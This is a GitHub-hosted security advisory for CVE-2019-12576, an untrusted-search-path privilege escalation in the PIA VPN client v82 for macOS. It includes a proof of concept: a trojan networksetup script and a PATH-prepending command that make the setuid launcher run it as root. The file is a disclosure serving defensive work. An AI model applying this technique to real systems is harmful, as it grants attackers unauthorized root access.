Permalink
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
security-research/vulnerabilities/PIA/CVE-2019-12576.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
76 lines (45 sloc)
2.17 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Title: PIA macOS Privilege Escalation: Untrusted Search Path | |
| Author: Rich Mirch | |
| CVE: CVE-2019-12576 | |
| Vendor Advisory: N/A | |
| Description | |
| A vulnerability in the London Trust Media Private Internet Access (PIA) VPN | |
| Client v82 for macOS could allow an authenticated, local attacker to run | |
| arbitrary code with elevated privileges. | |
| The PIA macOS openvpn_launcher binary is setuid root. This program is called | |
| during the connection process and executes several operating system utilities | |
| to configure the system. The networksetup utility is called using relative paths. | |
| A local unprivileged user can execute arbitrary commands as root by creating a | |
| networksetup trojan which will be executed during the connection process. This | |
| is possible because the PATH environment is not reset prior to executing the | |
| OS utility. | |
| CVSS | |
| Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F | |
| Base: 7.8 | |
| Temporal: 7.6 | |
| Test Environment | |
| OS: macOS Mojave 10.14.1 | |
| Kernel: Darwin Kernel Version 18.2.0 | |
| PIA Version: v82 | |
| Steps to reproduce | |
| All steps are executed as a low privileged user. | |
| Step 1 - Create a script named networksetup with the following two lines. This | |
| PoC will send the output of the id command to wall. This will show that its | |
| running with root privileges(uid=0). | |
| #!/bin/sh | |
| echo "$0: $(/usr/bin/id)"|/usr/bin/wall | |
| Step 2 - Make the networksetup script executable. | |
| chmod 755 networksetup | |
| Step 3 - Execute run.sh to open the PIA GUI client while prepending the current | |
| working directory($PWD) to the PATH environment variable. This ensures that the | |
| trojan networksetup script is executed first because relative paths are used. | |
| env "PATH=$PWD:$PATH" /Applications/Private\ Internet\ Access.app/Contents/MacOS/run.sh | |
| Step 4 - Login and connect to the VPN | |
| During the connection process networksetup will be executed as root and see a | |
| wall message will be broadcasted showing the output of id command with uid=0. | |
| Timeline: | |
| 2018-12-18: Reported to vendor | |
| 2018-12-19: Vendor acknowledged receipt of report | |
| 2019-01-18: Vendor states fix will be available in v83 however this version was never released. | |
| The desktop client was re-written. Upgrade to v1.2.1+ of the new client. | |
| 2019-06-10: Public disclosure |